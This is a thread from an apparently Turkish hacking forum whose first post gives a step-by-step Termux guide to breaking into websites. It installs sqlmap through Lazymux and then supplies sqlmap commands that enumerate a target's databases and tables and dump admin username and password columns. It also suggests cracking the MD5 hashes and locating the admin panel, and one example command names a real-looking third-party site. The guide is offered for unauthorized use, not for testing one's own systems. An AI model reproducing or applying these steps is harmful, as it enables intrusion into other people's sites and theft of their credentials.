Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Mobil İşletim Sistemleri
> Google Android

Google Android Google Android işletim sistemine sahip tüm cep telefonları ve tabletler hakkında genel bilgiler



Termux İle Site Hacklemek

Google Android

Yeni Konu aç Cevapla
 
Seçenekler
Alt 6 Gün önce   #1
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
01/2019
Mesajlar
4
Konular
3

Teşekkür (Etti): 1
Teşekkür (Aldı): 2


Post Termux İle Site Hacklemek



Google play 'a girip termux uygulamasini indiriyoruz daha sonra uygulamayi açıyoruz.
Uygulamayi açtiktan sonra biraz bekleyecek daha sonra komut ekrani gelecek
Komut satiri geldi simdi yapmamiz gereken şunlar ;

1-)apt update (uygulamayi günceller ve bunu birkere yaparsiniz)
2) pkg install git (bu komut ise git ' i kurar bunun sayesinde github sitesinden linux tabanli programlari klonlayabilir yani indirebilirsiniz)
3-)pkg install python (Bu komut en önemli komuttur çünkü bu komut sayesinde linux programlarini çaliştirabilirsiniz (.sh vs istisna) )
4-)pkg install python2(Bu komut python2 yi kurar bazı linux programlari python 'un yüksek sürümünü kullanir oyüzden bunuda kurmak şart )
Paketi kurmak için izin isteyecektir ( [Y/N] ) kurmak için Y yazip enter ' a basın)
Şimdi sıra web-hacking (website hacklemek için kullanicagimiz programlari kurmak)
Kurmak için git clone (kuracagimiz programin github adresi)

Bizim kuracagimiz program lazymux olacak.Lazymux nedir diye sorarsaniz
lazymux linux hack araçlarini içinde bulunduran dilediginizi kurmanizi saglayan program

Şimdi nasil kurulacagini anlatiyorum

Kurmak için git clone komutunu kullanacagiz

git clone https://github.com/Gameye98/Lazymux.git (yazip enter)

Daha sonra size yukarida bahsettiğim gibi Y/N paket kurulsun mu diye soracak
siz Y yazıp enter 'a basin paket kurulduktan sonra yazacagimiz komutlar şöyle

$: cd (komut satirina cd yazip enter)

$: ls (komut satirina ls yazip enter)

Komut satirina ls yazip enter 'a bastiğınız zaman şöyle bir şey belirecek

Lazymux

Bu git clone ile yüklediğimiz program olan lazymux programinin klasörü

Klasörü açmak için ;

$: cd Lazymux (komut satirina yazip enter)
$: ls (komut satirina yazip enter)

Ls yazdiktan sonra bizi ilgilendiren dosya şu olacak

lazymux.py

Bu dosya web siteleri hacklemek için kullanacagimiz programlari indirmemizi saglayacak

programi calistirmak için

$: python2 lazymux.py (komut satirina yazip enter)
Karşımıza numaralar gelicek

Burada seçim yapmak için seçeneklerin numarasi kullanilir

Örn;
01 : İnformation gathering

Bizim indirecegimiz program 05 yani web-hacking bölümünde

altta bulunan

lzmx> 05 yazip enter 'a bssiyoruz

Karşımıza birsürü program çıkıcak bizim kullanacagimiz program sqlmap programi (eger isterseniz baska programda yukleyebilirsiniz fakat sql injection yapamazsiniz wordpressscan xsheel vs vs)

Sqlmap programi ilk sirada olsudugu için 01 yazip enter 'a basiyoruz
Enter 'a bastiktan sonra size yine (Y/N) sorabilir Y yazip enter 'a basin program baya geniş çapli oldugu için receivering objects bölümünde yüklenmesi biraz uzun sürecektir.

Program yüklendikten sonra

[99] back to menu
[00] exit lazymux

yazisi çıkacak biz 00 yazip enter ' a basiyoruz ve lazymux programindan çikiyoruz

programdan çıktıktan sonra komut satırına ;

$: cd
$: ls
Daha sonra slmap klasörü görünecek

Lazymux . sqlmap

Biz sqlmap klasörüne gireceğiz

Klasöre girmek için komut satırına

$: cd sqlmap
$: ls

yazdiktan sonra yine sqlmap 'a ait doayalar görünecek bize lazim olan dosya ise;
sqlmap.py

Şimdi çalistirmadan önce nasil kullanacaginizi anlatiyim
İlk yapacagimiz işlem. şöyle ;
Sql açığı tespit ettiğiniz sitenin database sine girecegiz

Bunun için
komut satırına şu kodlari yaziyoruz ;


python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

hedef sitenin sql acigi buldugunuz bölümün url sini giriniz örnek ;

http://www.site.com/index.php?id=41

yukaridaki komutu girip enter 'a bastiginiz anda sql açıklı websitesini tarayıp database ' sine girecektir.(tarama biraz uzun sürebilir)

Tarama bittikten sonra databaseler ekrana gelecektir ;

[+]information_schema

[+]w3bdb

Databaseden tablolari cekmek icin komut satirina ;

$: python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=41" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databaseismi --tables


Yukaridaki komutu yazdiktan sonra size databasede bulunan tablolari listeleyecektir bu liste çok uzun olabilir ve admin bilgilerini bulmanizi zorlastirabilir


Örnek
information_schema da bulunan tablolar
-------------------------------
TABLE_NAMES
USER_PRİVİLEGES
vsvs
---------------------------

Diyelimki admin user pass olan tabloyu buldunuz

Tablodaki verileri çekmek için ise ;

komut satırına ;

$: python2 sqlmap.py -u "http://cordoganclark.com/newsitem.php?id=8" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D databaseismi -T tabloismi -C username,password --dump

Bu komutu yaziyorsunuz sizde veri isimleri değişik olabilir ben örnek olarak yazdim

ekrana şöyle bir çıktı geldi varsayalim ;

-------------------------------------
username . a2dbnsjeia245
password. 243ma2134666
------------------------------------
Böyle bir sonuç çikarsa hash killer ile md5 şifrelenmis bilgileri bulabilirsiniz

Admin paneli bulmak için yüklediğimiz lazymux programinda mevcut programlar var onlari kullanabilirsiniz.

İyi Hackler diliyorum. Umarım yararlı olmuştur.



___________________________________________

Ziyaret Vakti.

 Offline  
 
Alıntı ile Cevapla
Teşekkür

trqala1453, MuhammedTRK Teşekkür etti.
Alt 6 Gün önce   #2
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
09/2018
Mesajlar
Konular

Teşekkür (Etti): 17
Teşekkür (Aldı): 52




Daha once ayni şekilde açıldı alıntı bir konudir

Konu 'PALA tarafından (6 Gün önce Saat 18:32 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 5 Gün önce   #3
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
03/2018
Nereden
İstanbul
Mesajlar
9
Konular
2

Teşekkür (Etti): 5
Teşekkür (Aldı): 2




Bu konu sanki ayyıldız forumdan ama ...
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau